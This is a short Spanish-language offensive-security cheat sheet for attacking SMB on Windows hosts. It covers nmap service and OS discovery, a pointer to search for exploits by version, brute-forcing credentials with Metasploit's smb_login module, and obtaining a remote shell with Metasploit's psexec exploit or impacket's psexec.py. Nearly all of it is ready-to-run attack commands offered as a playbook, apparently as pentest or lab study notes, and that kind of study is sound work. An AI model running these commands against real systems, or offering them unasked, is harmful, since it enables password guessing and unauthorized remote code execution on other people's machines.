:: π Reconocimiento con NMAP
ββ[ code ]ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
nmap -sCV <ip>
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Si pone el siguiente mensaje: Message signing enabled but not required podemos usar PsExec (Nos
permite Ejecutar comandos)
El siguiente comando nos permitirΓ‘ ver el tipo de samba/smb que esta corriendo y despuΓ©s buscamos
exploit respecto a la versiΓ³n
ββ[ code ]ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
nmap -p 445 --script smb-os-discovery <IP>
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
:: π Fuerza bruta con metasploit
MΓ³dulo a utilizar: auxiliary/scanner/smb/smb_login
:: βΈ PsExec con Metasploit (Recomendado)
MΓ³dulo a utilizar: exploit/windows/smb/psexec
ββ[ code ]ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
use exploit/windows/smb/psexec
set RHOSTS <IP>
set SMBUser <User>
set SMBPass <Password>
exploit
shell
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
:: βΈ PsExec
Si tenemos las credenciales y se cumple la condiciΓ³n mencionada arriba (Message signing enabled but
not required) podemos usar la herramienta
ββ[ code ]ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
psexec.py <user>@<IP> cmd.exe
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ